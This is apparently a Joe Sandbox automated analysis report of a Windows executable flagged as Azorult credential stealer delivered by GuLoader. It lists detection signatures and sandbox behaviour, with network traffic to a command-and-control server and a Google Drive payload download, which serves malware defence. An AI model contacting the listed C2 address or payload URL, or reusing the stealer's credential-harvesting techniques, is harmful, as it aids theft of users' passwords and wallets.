Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
No. 1349240400713.exe

Overview

General Information

Sample name:No. 1349240400713.exe
Analysis ID:1548261
MD5:0049a8ce1e4c42cea9b5d2516c64612c
SHA1:f0526a23f7f5de1c0b2200e92fba833edcacbe02
SHA256:d0549673b20a4041c1d1bfbdd841b0b768fefa6057f6a4203d54d0694f270cff
Tags:exeuser-lowmal3
Infos:

Detection

Azorult, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Azorult
Yara detected GuLoader
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • No. 1349240400713.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\No. 1349240400713.exe" MD5: 0049A8CE1E4C42CEA9B5D2516C64612C)
    • No. 1349240400713.exe (PID: 1916 cmdline: "C:\Users\user\Desktop\No. 1349240400713.exe" MD5: 0049A8CE1E4C42CEA9B5D2516C64612C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AzorultAZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000003.1880587120.0000000037070000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
    00000000.00000002.1607100598.0000000000870000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
      00000009.00000003.1879186394.0000000037054000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
        00000009.00000003.1880512323.00000000378C8000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000009.00000003.1880531746.00000000378CC000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.3.No. 1349240400713.exe.374ad227.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              9.3.No. 1349240400713.exe.374ad227.1.raw.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
              • 0x421dbc:$string1: SELECT origin_url, username_value, password_value FROM logins
              • 0x422c91:$string1: SELECT origin_url, username_value, password_value FROM logins
              • 0x29261f:$string2: API call with %s database connection pointer
              • 0x293253:$string3: os_win.c:%d: (%lu) %s(%s) - %s
              9.3.No. 1349240400713.exe.374a8abf.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                9.3.No. 1349240400713.exe.374a8abf.2.raw.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
                • 0x426524:$string1: SELECT origin_url, username_value, password_value FROM logins
                • 0x4273f9:$string1: SELECT origin_url, username_value, password_value FROM logins
                • 0x296d87:$string2: API call with %s database connection pointer
                • 0x2979bb:$string3: os_win.c:%d: (%lu) %s(%s) - %s
                9.3.No. 1349240400713.exe.374a4355.3.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 1 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-04T09:27:18.044342+010020229301A Network Trojan was detected4.245.163.56443192.168.2.749733TCP
                  2024-11-04T09:27:57.432958+010020229301A Network Trojan was detected4.245.163.56443192.168.2.749938TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-04T09:27:56.072598+010020291411Malware Command and Control Activity Detected89.40.31.23280192.168.2.749932TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-04T09:27:55.950423+010020294651Malware Command and Control Activity Detected192.168.2.74993289.40.31.23280TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-04T09:27:55.950423+010028102761Malware Command and Control Activity Detected192.168.2.74993289.40.31.23280TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-04T09:27:50.855976+010028032702Potentially Bad Traffic192.168.2.749905142.250.185.238443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: No. 1349240400713.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.7:49905 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.7:49911 version: TLS 1.2
                  Source: No. 1349240400713.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ucrtbase.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1880017638.000000003748C000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1880017638.000000003748C000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vcruntime140.i386.pdbGCTL source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1880017638.000000003748C000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879220439.00000000378F0000.00000004.00001000.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1880472952.0000000037D14000.00000004.00001000.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1880059026.0000000037488000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1880017638.000000003748C000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msvcp140.i386.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ucrtbase.pdbUGP source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1880017638.000000003748C000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vcruntime140.i386.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msvcp140.i386.pdbGCTL source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: No. 1349240400713.exe, 00000009.00000003.1879583975.00000000374A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_0040676F FindFirstFileW,FindClose,0_2_0040676F
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 0_2_00405B23 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B23
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 9_2_0040676F FindFirstFileW,FindClose,9_2_0040676F
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 9_2_00402902 FindFirstFileW,9_2_00402902
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeCode function: 9_2_00405B23 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_00405B23
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Users\user\Desktop\No. 1349240400713.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2029465 - Severity 1 - ET MALWARE Win32/AZORult V3.2 Client Checkin M15 : 192.168.2.7:49932 -> 89.40.31.232:80
                  Source: Network trafficSuricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.7:49932 -> 89.40.31.232:80
                  Source: Network trafficSuricata IDS: 2029141 - Severity 1 - ET MALWARE AZORult v3.2 Server Response M3 : 89.40.31.232:80 -> 192.168.2.7:49932
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.7:49733
                  Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49905 -> 142.250.185.238:443
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.7:49938
                  Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1MH4PBcg5lUR7-iNRXL3tEF69vWwWBAnh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /download?id=1MH4PBcg5lUR7-iNRXL3tEF69vWwWBAnh&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /12/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 89.40.31.232Content-Length: 107Cache-Control: no-cacheData Raw: 4a 4c 89 28 39 ff 4c 2f fb 39 2f fb 39 4f ed 3f 4e ed 3e 3c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 ff 28 39 ff 4f 4e 89 28 39 f0 48 2f fa 49 2f fb 3f 2f fb 35 2f fb 3e 4c 8d 28 39 fc 28 39 f9 28 39 fb 28 38 8c 28 39 fb 28 39 f1 4e 2f fb 35 2f fb 3c 2f fb 3b 2f fb 39 4b ed 3e 32 Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9(9ON(9H/I/?/5/>L(9(9(9(8(9(9N/5/</;/9K>2
                  Source: global trafficHTTP traffic detected: POST /12/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 89.40.31.232Content-Length: 58476Cache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1MH4PBcg5lUR7-iNRXL3tEF69vWwWBAnh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /download?id=1MH4PBcg5lUR7-iNRXL3tEF69vWwWBAnh&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: drive.google.com
                  Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                  Source: unknownHTTP traffic detected: POST /12/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 89.40.31.232Content-Length: 107Cache-Control: no-cacheData Raw: 4a 4c 89 28 39 ff 4c 2f fb 39 2f fb 39 4f ed 3f 4e ed 3e 3c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 ff 28 39 ff 4f 4e 89 28 39 f0 48 2f fa 49 2f fb 3f 2f fb 35 2f fb 3e 4c 8d 28 39 fc 28 39 f9 28 39 fb 28 38 8c 28 39 fb 28 39 f1 4e 2f fb 35 2f fb 3c 2f fb 3b 2f fb 39 4b ed 3e 32 Data Ascii: JL(9L/9/9O?N><>3>>>;>>>3>:>=?N(9(9ON(9H/I/?/5/>L(9(9(9(8(9(9N/5/</;/9K>2
                  Source: No. 1349240400713.exe, 00000009.00000003.1863707433.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1859976358.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1863957270.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1864082338.000000000693C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.40.31.232/
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1864082338.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000002.1886652330.000000000690F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.40.31.232/12/index.php
                  Source: No. 1349240400713.exe, 00000009.00000003.1863707433.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1859976358.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1863957270.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1864082338.000000000693C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.40.31.232/12/index.php$
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.40.31.232/12/index.php6
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.40.31.232/12/index.phpK
                  Source: No. 1349240400713.exe, 00000009.00000003.1863707433.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1859976358.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1863957270.000000000693C000.00000004.00000020.00020000.00000000.sdmp, No. 1349240400713.exe, 00000009.00000003.1864082338.000000000693C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.40.31.232/12/index.phpde
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.40.31.232/12/index.phpept-Ra
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.40.31.232/12/index.phpquest-context
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.000000000692D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.40.31.232/12/index.phprol-Al
                  Source: No. 1349240400713.exe, 00000009.00000002.1886652330.0000000006921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.40.31.232/12/index.phptVersion
